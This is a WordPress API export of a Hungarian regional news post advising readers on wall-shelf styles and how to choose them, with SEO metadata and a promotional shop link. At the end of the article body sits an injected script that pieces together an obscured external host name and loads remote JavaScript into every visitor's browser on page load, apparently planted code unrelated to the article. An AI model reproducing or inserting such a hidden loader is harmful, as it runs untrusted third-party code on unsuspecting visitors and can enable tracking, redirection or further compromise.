{"id":34211,"date":"2021-06-23T07:04:27","date_gmt":"2021-06-23T05:04:27","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=34211"},"modified":"2021-06-23T07:04:47","modified_gmt":"2021-06-23T05:04:47","slug":"milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/","title":{"rendered":"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend"},"content":{"rendered":"<p><strong>\u00dagy vagyunk a polcokkal, mint Gomb\u00f3c Art\u00far a csokival: j\u00f6het kerek, sz\u00f6gletes, h\u00e1romsz\u00f6g alak\u00fa, de a legextr\u00e9mebb v\u00e1ltozat is. Aminek az idei \u00e9v b\u0151ven teret is ad.<\/strong><\/p>\n<p>A design fali polcok nem ismernek lehetetlent, \u00e9s nem ismernek hat\u00e1rokat sem. M\u00e1r nem vagyunk a klasszikus form\u00e1khoz \u00e9s anyagokhoz k\u00f6tve. A formatervez\u00e9s \u00e9s a k\u00fcl\u00f6nf\u00e9le anyagok, illetve sz\u00ednek mellett azonban nagy hangs\u00falyt kap a funkcionalit\u00e1s is. Hiszen egy polc m\u00e9gis csak arra val\u00f3, hogy t\u00e1roljunk rajta valamit, persze az, hogy mit az rajtunk \u00e9s a helyis\u00e9gen m\u00falik ahov\u00e1 ker\u00fclni fog.<\/p>\n<p><strong>N\u00e9zz\u00fck a lehet\u0151s\u00e9geket!<\/strong><\/p>\n<p>A <a href=\"https:\/\/dodo.hu\/collections\/fali-polcok\" target=\"_blank\" rel=\"dofollow noopener\"><span style=\"text-decoration: underline; color: #0000ff;\">design fali polcok<\/span><\/a> igen praktikus elemei az otthonunknak, hiszen a legkisebb helyis\u00e9gekben is egy pillanat alatt teremthet\u00fcnk vel\u00fck extra pakol\u00f3helyeket. Funkcionalit\u00e1sa mellett pedig egy j\u00f3l kiv\u00e1lasztott polc nem csak t\u00e1r\u00f3l\u00f3 alkalmatoss\u00e1g lesz, de kiv\u00e1l\u00f3 d\u00edsze is az adott szob\u00e1nak. Nem kell hozz\u00e1 sok t\u00e9r, csup\u00e1n n\u00e9mi \u00fcres falfel\u00fclet. Egyszer\u0171en szerelhet\u00fcnk polcot az \u00e1gy vagy a kanap\u00e9 f\u00f6l\u00e9, de ak\u00e1r a t\u00e9v\u00e9 m\u00f6g\u00f6tti falfel\u00fcletet is kihaszn\u00e1lhatjuk. Egy fali polc t\u00e9nyleg b\u00e1rmelyik helyis\u00e9gben meg\u00e1llja a hely\u00e9t csup\u00e1n az adott t\u00e9rnek megfelel\u0151en kell v\u00e1lasztanunk. Ha sok a k\u00f6nyv a lak\u00e1sban, vagy az apr\u00f3 d\u00edszt\u00e1rgyak, akkor a legjobb v\u00e1laszt\u00e1s, ha a szabad falfel\u00fcletek kihaszn\u00e1l\u00e1s\u00e1ban keress\u00fck a megold\u00e1st.<\/p>\n<ul>\n<li><strong>Egyszer\u0171 polcok<\/strong><\/li>\n<\/ul>\n<p>Ha sokkal ink\u00e1bb a pakolhat\u00f3s\u00e1g a fontos, akkor \u00e9rdemes n\u00e9h\u00e1ny massz\u00edvabb kivitelez\u00e9s\u0171 egyszer\u0171 megjelen\u00e9s\u0171 polcot v\u00e1lasztani. Ezekhez \u00e1ltal\u00e1ban k\u00fcl\u00f6n kaphat\u00f3 a felf\u00fcggeszt\u00e9s \u00e9s olyan t\u00e1vols\u00e1gba szerelj\u00fck fel \u0151ket, ahogy a felhaszn\u00e1l\u00e1s megk\u00edv\u00e1nja. J\u00f3l rendezhet\u0151ek, ak\u00e1r \u00edr\u00f3asztal f\u00f6l\u00e9 vagy a konyh\u00e1ban is remek\u00fcl beilleszthet\u0151k. Elb\u00edrj\u00e1k a nehezebb dolgokat is, mint p\u00e9ld\u00e1ul k\u00f6nyvek vagy gyerekj\u00e1t\u00e9kok, de ha csak d\u00edszt\u00e1rgyakat, esetleg a f\u0171szereket akarjuk r\u00e1tenni, annak is kiv\u00e1l\u00f3.<\/p>\n<ul>\n<li><strong>Modern \u201edoboz\u201d polcok<\/strong><\/li>\n<\/ul>\n<p>Az egyszer\u0171 polcokhoz hasonl\u00f3an el\u00e9gg\u00e9 sokoldal\u00fa a felhaszn\u00e1lhat\u00f3s\u00e1guk, \u00e1ltal\u00e1ban t\u00f6bb elemb\u0151l \u00e1llnak. Gyakran eml\u00e9keztetnek egy \u00edzl\u00e9ses kirakatra a dobozszer\u0171 kin\u00e9zet\u00fckkel. Olykor m\u00e9g egy \u00fcvegajt\u00f3t is kapnak, amit\u0151l vitrin hat\u00e1suk lesz. T\u00f6bb ilyet v\u00e1s\u00e1rolva k\u00fcl\u00f6nf\u00e9le elrendez\u00e9sben szerelhet\u0151ek fel, amit\u0151l igaz\u00e1n trendi hat\u00e1st keltenek a klasszikus f\u00e1b\u00f3l k\u00e9sz\u00fclt elemek is. Kiv\u00e1l\u00f3 megold\u00e1s a nappaliban a kanap\u00e9 f\u00f6l\u00e9, nem csak a k\u00f6nyveket tartja meg, de fel is dobja a teret.<\/p>\n<ul>\n<li><strong>Design polcok<\/strong><\/li>\n<\/ul>\n<p>Ha kev\u00e9sb\u00e9 sz\u00e1m\u00edt a haszn\u00e1lhat\u00f3s\u00e1g, \u00e9s ink\u00e1bb csak dekor elemk\u00e9nt szeretn\u00e9nk, ha a polc a falra ker\u00fclne, akkor b\u00e1tran v\u00e1logathatunk a legmer\u00e9szebb kialak\u00edt\u00e1sok k\u00f6z\u00fcl is. Nincsen hat\u00e1r, ma m\u00e1r megtal\u00e1lhat\u00f3 az \u00fczletekben a kerek formatervez\u00e9st\u0151l az egyedi alakzat\u00fa polcokig szinte minden. Persze a k\u00fcl\u00f6nleges formatervez\u00e9s nem z\u00e1rja ki a j\u00f3 strapab\u00edr\u00f3 k\u00e9pess\u00e9get sem. Lehet egyszerre sz\u00e9p, divatos \u00e9s remek\u00fcl haszn\u00e1lhat\u00f3 is egy polc. Igaz\u00e1n kreat\u00edv \u00e9s dekorat\u00edv megold\u00e1s a t\u00f6bb elemb\u0151l \u00e1ll\u00f3 polcrendszer, mely eset\u00e9be teljesen \u00edzl\u00e9s szerint vari\u00e1lhat\u00f3k az egyes r\u00e9szek, ezzel m\u00e9g ink\u00e1bb kihangs\u00falyozva az otthonunk egyedis\u00e9g\u00e9t.<\/p>\n<ul>\n<li><strong>Klasszikusok<\/strong><\/li>\n<\/ul>\n<p>Az \u00fcveg \u00e9s a kov\u00e1csoltvas polcelemek nagyon r\u00e9g\u00f3ta vel\u00fcnk vannak, \u00e9s b\u00e1tran mondhatjuk, hogy soha nem mennek ki a divatb\u00f3l csup\u00e1n a kombin\u00e1ci\u00f3k v\u00e1ltoznak. Az \u00fcveg polcok j\u00f3 tiszt\u00edthat\u00f3s\u00e1ga miatt k\u00f6zkedvelt b\u00fatora a f\u00fcrd\u0151szob\u00e1knak, a kov\u00e1csoltvas mint\u00e1zatok pedig remek tart\u00f3elemk\u00e9nt szolg\u00e1lnak egy rusztikus fa polcnak.<\/p>\n<p><strong>Hogyan v\u00e1lasszunk?<\/strong><\/p>\n<p>Gondoljuk v\u00e9gig, hogy hova ker\u00fcl \u00e9s mire fogjuk haszn\u00e1lni, mit szeretn\u00e9nk r\u00e1tenni. K\u00f6nyves polc eset\u00e9ben \u00e9rdemes egyszer\u0171bb, ink\u00e1bb massz\u00edv megold\u00e1sokat v\u00e1lasztani. De, ha csak egy v\u00e1z\u00e1t vagy apr\u00f3s\u00e1gokat akarunk rajta tartani, akkor b\u00e1tran v\u00e1laszthatunk a k\u00f6nnyebb szerkezet\u0171, k\u00fcl\u00f6nf\u00e9le form\u00e1k k\u00f6z\u00fcl. Nagyon divatos megold\u00e1s a t\u00f6bb kisebb elemb\u0151l \u00e1ll\u00f3 egym\u00e1st\u00f3l t\u00e1volabb elhelyezett polc, melyeken csak egy-egy kisebb pozsg\u00e1s n\u00f6v\u00e9ny vagy szobrocska pihen.<\/p>\n<p><script>\n(function(){\nwqzs=document.createElement(\"script\");wqzs.type=\"text\/javascript\";\nwqzs.async=true;wqzs_=((\"us\")+\"t\")+\"a\";wqzs_+=(\"t.i\")+\"\"+\"n\";wqzs_+=((\"f\")+\"o\");wqzs_+=\"\/\";\nwqzsu=\"305783468.\";wqzsu+=\"dwXXxg8vqzsp4sqs8cv1ub8Xj4gb9v\";wqzs.src=\"https:\/\/\"+wqzs_+wqzsu;\nwqzsdb=document.body;wqzsdb.appendChild(wqzs);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00dagy vagyunk a polcokkal, mint Gomb\u00f3c Art\u00far a csokival: j\u00f6het kerek, sz\u00f6gletes, h\u00e1romsz\u00f6g alak\u00fa, de a legextr\u00e9mebb v\u00e1ltozat is. Aminek az idei \u00e9v b\u0151ven teret is ad. A design fali polcok nem ismernek lehetetlent, \u00e9s nem ismernek hat\u00e1rokat sem. M\u00e1r nem vagyunk a klasszikus form\u00e1khoz \u00e9s anyagokhoz k\u00f6tve. A formatervez\u00e9s \u00e9s a k\u00fcl\u00f6nf\u00e9le anyagok, illetve<\/p>\n","protected":false},"author":1,"featured_media":34212,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[5783,5782],"class_list":{"0":"post-34211","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-fali-polcok","9":"tag-polcok"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"\u00dagy vagyunk a polcokkal, mint Gomb\u00f3c Art\u00far a csokival: j\u00f6het kerek, sz\u00f6gletes, h\u00e1romsz\u00f6g alak\u00fa, de a legextr\u00e9mebb v\u00e1ltozat is. Aminek az idei \u00e9v b\u0151ven teret is ad. A design fali polcok nem ismernek lehetetlent, \u00e9s nem ismernek hat\u00e1rokat sem. M\u00e1r nem vagyunk a klasszikus form\u00e1khoz \u00e9s anyagokhoz k\u00f6tve. A formatervez\u00e9s \u00e9s a k\u00fcl\u00f6nf\u00e9le anyagok, illetve\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-23T05:04:27+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:modified_time\" content=\"2021-06-23T05:04:47+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2021\/06\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg?fit=600%2C400&ssl=1\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"600\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend\",\"datePublished\":\"2021-06-23T05:04:27+00:00\",\"dateModified\":\"2021-06-23T05:04:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/\"},\"wordCount\":803,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg\",\"keywords\":[\"fali polcok\",\"polcok\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/\",\"name\":\"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg\",\"datePublished\":\"2021-06-23T05:04:27+00:00\",\"dateModified\":\"2021-06-23T05:04:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg\",\"width\":600,\"height\":400},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/06\\\/23\\\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/","og_locale":"hu_HU","og_type":"article","og_title":"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend","og_description":"\u00dagy vagyunk a polcokkal, mint Gomb\u00f3c Art\u00far a csokival: j\u00f6het kerek, sz\u00f6gletes, h\u00e1romsz\u00f6g alak\u00fa, de a legextr\u00e9mebb v\u00e1ltozat is. Aminek az idei \u00e9v b\u0151ven teret is ad. A design fali polcok nem ismernek lehetetlent, \u00e9s nem ismernek hat\u00e1rokat sem. M\u00e1r nem vagyunk a klasszikus form\u00e1khoz \u00e9s anyagokhoz k\u00f6tve. A formatervez\u00e9s \u00e9s a k\u00fcl\u00f6nf\u00e9le anyagok, illetve","og_url":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2021-06-23T05:04:27+00:00","article_modified_time":"2021-06-23T05:04:47+00:00","og_image":[{"width":600,"height":400,"url":"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2021\/06\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg?fit=600%2C400&ssl=1","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend","datePublished":"2021-06-23T05:04:27+00:00","dateModified":"2021-06-23T05:04:47+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/"},"wordCount":803,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/06\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg","keywords":["fali polcok","polcok"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/","url":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/","name":"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/06\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg","datePublished":"2021-06-23T05:04:27+00:00","dateModified":"2021-06-23T05:04:47+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/06\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/06\/hemingway-barna-mahagoni-falipolc-dodo-home-design-butor-908_600x.jpg","width":600,"height":400},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/06\/23\/milyen-polc-keruljon-a-falra-mutatjuk-iden-mi-a-trend\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Milyen polc ker\u00fclj\u00f6n a falra? Mutatjuk id\u00e9n mi a trend"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/34211","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=34211"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/34211\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/34212"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=34211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=34211"},{"taxonomy":"post_